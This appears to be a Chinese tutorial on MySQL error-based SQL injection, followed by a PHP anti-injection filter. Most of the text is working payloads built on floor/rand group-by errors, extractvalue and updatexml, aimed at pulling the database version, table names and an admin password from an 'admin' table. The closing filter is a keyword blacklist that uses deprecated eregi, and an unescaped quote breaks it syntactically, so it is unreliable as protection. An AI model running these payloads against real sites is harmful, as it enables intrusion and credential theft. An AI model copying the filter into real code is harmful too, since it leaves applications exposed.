1、通过floor报错
可以通过如下一些利用代码
| 代码如下 | 复制代码 |
| and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); | |
举例如下:
首先进行正常查询:
| 代码如下 | 复制代码 |
| mysql> select * from article where id = 1; | |
假如id输入存在注入的话,可以通过如下语句进行报错。
| 代码如下 | 复制代码 |
| mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); | |
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:
| 代码如下 | 复制代码 |
| Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a); Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2))); | |
2、ExtractValue
测试语句如下
| 代码如下 | 复制代码 |
| and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); | |
实际测试过程
| 代码如下 | 复制代码 |
| mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));-- | |
3、UpdateXml
测试语句
| 代码如下 | 复制代码 |
| and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) | |
实际测试过程
| 代码如下 | 复制代码 |
| mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1)); | |
上面人方法有一个特点就是查询语句很很长我们可以限制输入长度,这也可以有效的过滤不过sql注入了,下面我来给大家分享一个防sql注入函数。
1.函数的构建
| 代码如下 | 复制代码 |
| /* 函数名称:inject_check() 函数作用:检测提交的值是不是含有SQL注射的字符,防止注射,保护服务器安全 参 数:$sql_str: 提交的变量 返 回 值:返回检测结果,ture or false */ function inject_check($sql_str) { return eregi('select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile', $sql_str); // 进行过滤 } | |
2.函数的使用实例
| 代码如下 | 复制代码 |
| <?php | |
本文详细介绍了SQL注入攻击原理及防御方法,包括利用特定代码爆破数据库版本信息、防范注入的函数实现,以及如何构建安全的防SQL注入函数。重点讨论了如何检测提交的数据是否包含SQL注入字符,以确保服务器安全。
1462

被折叠的 条评论
为什么被折叠?



